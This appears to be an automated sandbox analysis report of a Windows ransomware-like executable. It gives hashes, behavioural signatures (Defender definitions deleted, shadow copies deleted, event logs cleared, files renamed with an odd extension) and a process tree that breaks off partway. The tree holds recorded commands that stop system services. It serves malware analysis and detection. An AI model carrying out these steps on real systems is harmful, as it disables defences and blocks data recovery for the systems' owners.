Analysis
-
max time kernel
16s -
max time network
127s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
22-11-2021 11:25
Static task
static1
Behavioral task
behavioral1
Sample
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
Resource
win10-en-20211014
General
-
Target
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
-
Size
2.7MB
-
MD5
d8d33f00e7124fe123cc2a581000a2e6
-
SHA1
233ef1e48543dea370f543c08d7c1ff6adba6e47
-
SHA256
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442
-
SHA512
726f6b154804755e7999d7ccdef8c0671d3a3b988dfeb54ca8f7090e791ef27056688aa9473771b85955932117ce0641eb9aca65d7a0e296b61382d5d804cc2b
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 296 MpCmdRun.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 320 bcdedit.exe 3868 bcdedit.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_oQ-wDP89Cs00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_6HrKbEfJRuY0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_Z3fo-0ZY6c00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_Oww9pF0Q-sc0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_VwIp9faNSSY0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\fr-FR\wab32res.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_F_XFM77bohY0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\eu.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_CGpWnkWtKwA0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_KoRV8HNmhc00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_dqrCfrnOmLU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\ado\adojavas.inc 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_NsfjfqN4JPA0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\msadc\adcjavas.inc 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_jcolt4xjniI0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_8MWj2xTES9Y0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\Services\verisign.bmp.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_sV7_x6EMU200.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\readme.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_3bXwq3wofd80.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD__RLCrWwZIoQ0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_n-Jtk_KYw0w0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_NliiFHFTY3k0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_aXhO9WezvJ80.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD__gfClGjURX80.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_UQ6FEs_-5Fc0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_l-c1FW_gz_40.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_-J7af6pBLS40.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\CloseDisable.dib.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_wOsZjJ0huOI0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\oledb32r.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_6B_qT-V2n-00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\ado\msado25.tlb 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_QFP5qfYUO6M0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_d5J-nFHqMpE0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_QB-43lilGXU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_Qnp1yB1uJNU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_744Pk4ze8jA0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_kDpN-XnaGS00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_ddkOSFpTwmI0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\History.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_DKbMBu7ckgg0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_uZt5FB95Dso0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_UaZGEf4RTbo0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\Services\verisign.bmp 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_DRu97PSBQtE0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_gZKOhCTeboY0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_MrmTydcahWQ0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_5K4gZqDzkXM0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_uICZGaPeIWA0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-tw.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_DJJxKmXg40s0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqlxmlx.rll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msdaremr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_tucMoD5QbSU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_5XkdE7DPLAo0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_0um_2YK92CI0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_ZW3UDf1-I6I0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_m4vZaXNJM1U0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_ZBJUtnWx0BU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_9MJ5i93kf0k0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_-oXbb6sjW0k0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_orSdBDv1Zbo0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3924 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1896 powershell.exe 1896 powershell.exe 1896 powershell.exe 1216 powershell.exe 1216 powershell.exe 1216 powershell.exe 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 832 wevtutil.exe Token: SeBackupPrivilege 832 wevtutil.exe Token: SeSecurityPrivilege 3340 wevtutil.exe Token: SeBackupPrivilege 3340 wevtutil.exe Token: SeSecurityPrivilege 2128 wevtutil.exe Token: SeBackupPrivilege 2128 wevtutil.exe Token: SeIncreaseQuotaPrivilege 2508 wmic.exe Token: SeSecurityPrivilege 2508 wmic.exe Token: SeTakeOwnershipPrivilege 2508 wmic.exe Token: SeLoadDriverPrivilege 2508 wmic.exe Token: SeSystemProfilePrivilege 2508 wmic.exe Token: SeSystemtimePrivilege 2508 wmic.exe Token: SeProfSingleProcessPrivilege 2508 wmic.exe Token: SeIncBasePriorityPrivilege 2508 wmic.exe Token: SeCreatePagefilePrivilege 2508 wmic.exe Token: SeBackupPrivilege 2508 wmic.exe Token: SeRestorePrivilege 2508 wmic.exe Token: SeShutdownPrivilege 2508 wmic.exe Token: SeDebugPrivilege 2508 wmic.exe Token: SeSystemEnvironmentPrivilege 2508 wmic.exe Token: SeRemoteShutdownPrivilege 2508 wmic.exe Token: SeUndockPrivilege 2508 wmic.exe Token: SeManageVolumePrivilege 2508 wmic.exe Token: 33 2508 wmic.exe Token: 34 2508 wmic.exe Token: 35 2508 wmic.exe Token: 36 2508 wmic.exe Token: SeIncreaseQuotaPrivilege 1104 wmic.exe Token: SeSecurityPrivilege 1104 wmic.exe Token: SeTakeOwnershipPrivilege 1104 wmic.exe Token: SeLoadDriverPrivilege 1104 wmic.exe Token: SeSystemProfilePrivilege 1104 wmic.exe Token: SeSystemtimePrivilege 1104 wmic.exe Token: SeProfSingleProcessPrivilege 1104 wmic.exe Token: SeIncBasePriorityPrivilege 1104 wmic.exe Token: SeCreatePagefilePrivilege 1104 wmic.exe Token: SeBackupPrivilege 1104 wmic.exe Token: SeRestorePrivilege 1104 wmic.exe Token: SeShutdownPrivilege 1104 wmic.exe Token: SeDebugPrivilege 1104 wmic.exe Token: SeSystemEnvironmentPrivilege 1104 wmic.exe Token: SeRemoteShutdownPrivilege 1104 wmic.exe Token: SeUndockPrivilege 1104 wmic.exe Token: SeManageVolumePrivilege 1104 wmic.exe Token: 33 1104 wmic.exe Token: 34 1104 wmic.exe Token: 35 1104 wmic.exe Token: 36 1104 wmic.exe Token: SeIncreaseQuotaPrivilege 1104 wmic.exe Token: SeSecurityPrivilege 1104 wmic.exe Token: SeTakeOwnershipPrivilege 1104 wmic.exe Token: SeLoadDriverPrivilege 1104 wmic.exe Token: SeSystemProfilePrivilege 1104 wmic.exe Token: SeSystemtimePrivilege 1104 wmic.exe Token: SeProfSingleProcessPrivilege 1104 wmic.exe Token: SeIncBasePriorityPrivilege 1104 wmic.exe Token: SeCreatePagefilePrivilege 1104 wmic.exe Token: SeBackupPrivilege 1104 wmic.exe Token: SeRestorePrivilege 1104 wmic.exe Token: SeShutdownPrivilege 1104 wmic.exe Token: SeDebugPrivilege 1104 wmic.exe Token: SeSystemEnvironmentPrivilege 1104 wmic.exe Token: SeRemoteShutdownPrivilege 1104 wmic.exe Token: SeUndockPrivilege 1104 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3672 wrote to memory of 4016 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 68 PID 3672 wrote to memory of 4016 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 68 PID 4016 wrote to memory of 3208 4016 net.exe 70 PID 4016 wrote to memory of 3208 4016 net.exe 70 PID 3672 wrote to memory of 1324 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 71 PID 3672 wrote to memory of 1324 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 71 PID 1324 wrote to memory of 1176 1324 net.exe 73 PID 1324 wrote to memory of 1176 1324 net.exe 73 PID 3672 wrote to memory of 1788 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 74 PID 3672 wrote to memory of 1788 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 74 PID 1788 wrote to memory of 2936 1788 net.exe 76 PID 1788 wrote to memory of 2936 1788 net.exe 76 PID 3672 wrote to memory of 692 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 77 PID 3672 wrote to memory of 692 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 77 PID 692 wrote to memory of 4052 692 net.exe 79 PID 692 wrote to memory of 4052 692 net.exe 79 PID 3672 wrote to memory of 3648 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 80 PID 3672 wrote to memory of 3648 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 80 PID 3648 wrote to memory of 3148 3648 net.exe 82 PID 3648 wrote to memory of 3148 3648 net.exe 82 PID 3672 wrote to memory of 3496 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 83 PID 3672 wrote to memory of 3496 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 83 PID 3496 wrote to memory of 3772 3496 net.exe 85 PID 3496 wrote to memory of 3772 3496 net.exe 85 PID 3672 wrote to memory of 3764 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 86 PID 3672 wrote to memory of 3764 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 86 PID 3764 wrote to memory of 2588 3764 net.exe 88 PID 3764 wrote to memory of 2588 3764 net.exe 88 PID 3672 wrote to memory of 2016 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 89 PID 3672 wrote to memory of 2016 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 89 PID 2016 wrote to memory of 2060 2016 net.exe 91 PID 2016 wrote to memory of 2060 2016 net.exe 91 PID 3672 wrote to memory of 1976 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 92 PID 3672 wrote to memory of 1976 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 92 PID 1976 wrote to memory of 604 1976 net.exe 94 PID 1976 wrote to memory of 604 1976 net.exe 94 PID 3672 wrote to memory of 1736 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 95 PID 3672 wrote to memory of 1736 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 95 PID 3672 wrote to memory of 712 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 97 PID 3672 wrote to memory of 712 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 97 PID 3672 wrote to memory of 1872 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 99 PID 3672 wrote to memory of 1872 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 99 PID 3672 wrote to memory of 3812 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 101 PID 3672 wrote to memory of 3812 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 101 PID 3672 wrote to memory of 3936 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 103 PID 3672 wrote to memory of 3936 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 103 PID 3672 wrote to memory of 2440 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 105 PID 3672 wrote to memory of 2440 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 105 PID 3672 wrote to memory of 2192 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 107 PID 3672 wrote to memory of 2192 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 107 PID 3672 wrote to memory of 2524 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 109 PID 3672 wrote to memory of 2524 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 109 PID 3672 wrote to memory of 2328 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 111 PID 3672 wrote to memory of 2328 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 111 PID 3672 wrote to memory of 1996 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 113 PID 3672 wrote to memory of 1996 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 113 PID 3672 wrote to memory of 3004 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 115 PID 3672 wrote to memory of 3004 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 115 PID 3672 wrote to memory of 2228 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 117 PID 3672 wrote to memory of 2228 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 117 PID 3672 wrote to memory of 2924 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 119 PID 3672 wrote to memory of 2924 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 119 PID 3672 wrote to memory of 2932 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 121 PID 3672 wrote to memory of 2932 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 121
Processes
-
C:\Users\Admin\AppData\Local\Temp\44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe"C:\Users\Admin\AppData\Local\Temp\44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3208
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1176
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
